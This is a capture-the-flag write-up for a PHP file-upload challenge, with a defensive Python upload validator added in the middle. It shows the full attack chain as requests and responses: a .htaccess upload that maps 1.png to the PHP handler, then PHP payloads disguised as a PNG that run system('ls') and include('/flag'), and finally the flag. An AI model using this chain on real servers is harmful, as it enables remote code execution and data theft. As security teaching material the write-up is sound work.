On entry there is a file upload endpoint.

```http
POST /upload.php HTTP/1.1

------WebKitFormBoundarycHfyDys9w8AAZN6l
Content-Disposition: form-data; name="uploaded"; filename="100.png"
Content-Type: image/png
```

First upload an empty image file to test the waters; the response gives the file path directly.

```
<meta charset="utf-8">/var/www/html/upload/3ebbfd8e68cc8f054ff0e3437d1686cc/100.png succesfully uploaded!
```

Upload a PHP file:

```http
POST /upload.php HTTP/1.1

------WebKitFormBoundarycHfyDys9w8AAZN6l
Content-Disposition: form-data; name="uploaded"; filename="100.php"
Content-Type: image/png
```

Response:

```
<meta charset="utf-8">我扌your problem?
```

Testing shows that every PHP-type extension is filtered, but we can also see that the folder name in the returned upload path never changes.

Upload a .htaccess file:

```http
POST /upload.php HTTP/1.1

------WebKitFormBoundarycHfyDys9w8AAZN6l
Content-Disposition: form-data; name="uploaded"; filename=".htaccess"
Content-Type: image/png

<FilesMatch "1.png">
SetHandler application/x-httpd-php
</FilesMatch>
```

Response:

```
<meta charset="utf-8"><br />
<b>Warning</b>: mkdir(): File exists in <b>/var/www/html/upload.php</b> on line <b>23</b><br />
/var/www/html/upload/3ebbfd8e68cc8f054ff0e3437d1686cc/.htaccess succesfully uploaded!
```

Now we only need to upload a 1.png that contains PHP code; the PHP code itself is not filtered at all.
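As an added defensive example (not code from the original writeup), here is a Python upload validator that closes the gap this challenge exploits: instead of a blocklist of PHP extensions it uses an allowlist, rejects dotfiles such as .htaccess, and checks the file's magic bytes rather than trusting the client-supplied Content-Type. The extension set and magic-byte table are assumptions chosen for the example.

```python
import os
import re

# Allowlist of extensions the endpoint accepts (assumption: image-only uploads).
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}

# Leading bytes each allowed type must start with (constructed table for this example).
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def check_upload(filename: str, content: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) for one multipart upload.

    Rejects the two things the writeup relies on: a .htaccess that re-maps
    1.png to the PHP handler, and a "PNG" whose body is really PHP source.
    """
    base = os.path.basename(filename)
    # Dotfiles never pass: ".htaccess" carries no PHP extension, so an
    # extension blocklist lets it through and Apache then honours SetHandler.
    if not base or base.startswith("."):
        return False, "dotfile or empty name"
    # Plain "name.ext" with a single dot, so double extensions and odd
    # characters do not need to be enumerated in a blocklist.
    m = re.fullmatch(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})", base)
    if not m:
        return False, "bad filename shape"
    ext = m.group(1).lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension {ext!r} not allowed"
    # Check the bytes, not the Content-Type header: the writeup sends
    # "image/png" for every payload including the .htaccess and PHP files.
    if not content.startswith(MAGIC[ext]):
        return False, "content does not match extension"
    # A PHP open tag anywhere in a real image is still a red flag.
    if b"<?php" in content or b"<?=" in content:
        return False, "embedded php tag"
    return True, "ok"


if __name__ == "__main__":
    # Constructed samples mirroring the writeup's uploads.
    print(check_upload(".htaccess", b'<FilesMatch "1.png">'))
    print(check_upload("1.png", b"<?php include('/flag'); ?>"))
    print(check_upload("100.png", MAGIC["png"] + b"\x00" * 16))
```

Validation alone is not enough if the upload directory stays under the web root with `AllowOverride` enabled; serving uploads from a directory where .htaccess is ignored and PHP is never executed removes the second half of the chain.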

Upload:

```http
------WebKitFormBoundarycHfyDys9w8AAZN6l
Content-Disposition: form-data; name="uploaded"; filename="1.png"
Content-Type: image/png

<?php
system('ls');
?>
```

Response:

```
<meta charset="utf-8"><br />
<b>Warning</b>: mkdir(): File exists in <b>/var/www/html/upload.php</b> on line <b>23</b><br />
/var/www/html/upload/3ebbfd8e68cc8f054ff0e3437d1686cc/1.png succesfully uploaded!
```

When we then visit the file, we can see that many command execution functions are disabled:

```
Warning: system() has been disabled for security reasons in /var/www/html/upload/3ebbfd8e68cc8f054ff0e3437d1686cc/1.png on line 2
```

Here we use the include function to include /flag directly:

```http
------WebKitFormBoundarycHfyDys9w8AAZN6l
Content-Disposition: form-data; name="uploaded"; filename="1.png"
Content-Type: image/png

<?php
include('/flag');
?>
```

Visiting the file yields the flag:

```
flag{c5549f57-3562-44a6-9f70-fda08f2f2380}
```